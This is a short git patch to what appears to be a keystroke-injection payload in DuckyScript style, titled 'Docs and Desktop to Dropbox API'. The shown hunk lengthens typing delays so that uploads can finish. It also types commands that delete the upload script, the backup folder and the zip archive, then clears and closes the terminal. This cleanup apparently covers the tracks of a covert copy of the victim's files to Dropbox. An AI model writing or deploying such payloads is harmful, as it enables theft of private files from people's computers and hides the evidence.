From c47f5b3f564e250c33a174212aa2f29c887de87b Mon Sep 17 00:00:00 2001 From: Narsty Date: Sat, 17 Jun 2023 16:52:44 -0500 Subject: [PATCH] Added a cleaner exit and updated Delays to ensure proper uploads Docs and Desktop to Dropbox API.txt --- Executions/Docs and Desktop to Dropbox API.txt | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/Executions/Docs and Desktop to Dropbox API.txt b/Executions/Docs and Desktop to Dropbox API.txt index ff219cf..e98a5b7 100644 --- a/Executions/Docs and Desktop to Dropbox API.txt +++ b/Executions/Docs and Desktop to Dropbox API.txt @@ -43,19 +43,22 @@ DELAY 500 STRING rm upload.sh DELAY 500 ENTER -DELAY 500 +DELAY 5000 STRING rm -r ~/Desktop/backup DELAY 500 ENTER -DELAY 500 +DELAY 5000 STRING rm backup.zip DELAY 500 ENTER DELAY 500 STRING clear +DELAY 500 ENTER DELAY 500 GUI w DELAY 1000 ENTER +DELAY 250 +ENTER